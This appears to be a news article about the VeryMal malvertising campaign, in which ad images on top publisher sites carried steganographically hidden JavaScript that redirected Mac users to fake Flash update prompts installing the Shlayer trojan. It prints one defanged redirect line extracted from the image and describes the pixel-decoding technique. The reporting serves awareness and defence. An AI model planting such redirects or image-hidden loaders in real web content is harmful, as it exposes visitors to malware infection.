Malvertisers target Mac users with steganographic code stashed in images

One of the malicious ads displayed in a campaign from VeryMal.

Researchers have uncovered a recent malicious advertisement campaign that’s notable for its size, scope, and resourcefulness: a two-day blitz triggered as many as 5 million times per day that used highly camouflaged JavaScript stashed in images to install a trojan on visitors’ Macs.

The ads were served by a group that security firm Confiant has dubbed VeryMal, after veryield-malyst.com, one of the ad-serving domains the group uses. A run that was active from January 11 to January 13 on about 25 of the top 100 publisher sites displayed the booby-trapped image as many as 5 million times a day. In an attempt to bypass increasingly effective measures for detecting malicious ads, the images used steganography—the ancient practice of hiding code, messages, or other data inside images or text—to deliver their malicious payload to Mac-using visitors.

In a blog post published Wednesday, Confiant researcher Eliya Stein wrote:

As malvertising detection continues to mature, sophisticated attackers are starting to learn that obvious methods of obfuscation are no longer getting the job done. The output of common JavaScript obfuscators is a very particular type of gibberish that can easily be recognized by the naked eye. Techniques like steganography are useful for smuggling payloads without relying on hex encoded strings or bulky lookup tables.

The image, which is displayed to the right of this text, looked unremarkable. Using some clever HTML5 programming under the hood, however, it delivered malicious code to unsuspecting Mac users. VeryMal created a canvas object, which developers use to render or enhance graphics. If the computer had Mac-specific fonts installed, the script would then loop through the underlying pixel data of the image and convert one pixel per iteration into an alphanumeric character. Appending each extracted character to a text string produced the following:

top.location.href = 'hxxp://veryield-malyst.com/' + volton + '?var1=' + wsw;

With that, the malvertisers had snuck the code they needed to redirect Mac users to a website that served display ads that falsely claimed the visitor’s Flash Player was out of date. Visitors who took the bait were then infected with Shlayer, a Mac trojan that came to light 11 months ago and is used to install adware.

This month’s campaign is by no means the first time VeryMal has struck. A similar campaign in December targeted Macs and iOS devices. Wednesday’s post said the group also targeted Windows-based users, but there’s no mention of whether those ads used similar steganographic techniques.

Wednesday’s post demonstrates how malvertisers continue to improve their techniques for slipping malicious content past advertisers who spend time and money to detect bad ads. Fortunately—for the moment, at least—most malicious ads seem to work by tricking visitors into clicking on OK buttons that will install malware. People who want to protect themselves should remain suspicious of any warning that displays while a Web advertisement is loaded. They should also ensure browsers and OSes are current and download updates only from official sources.
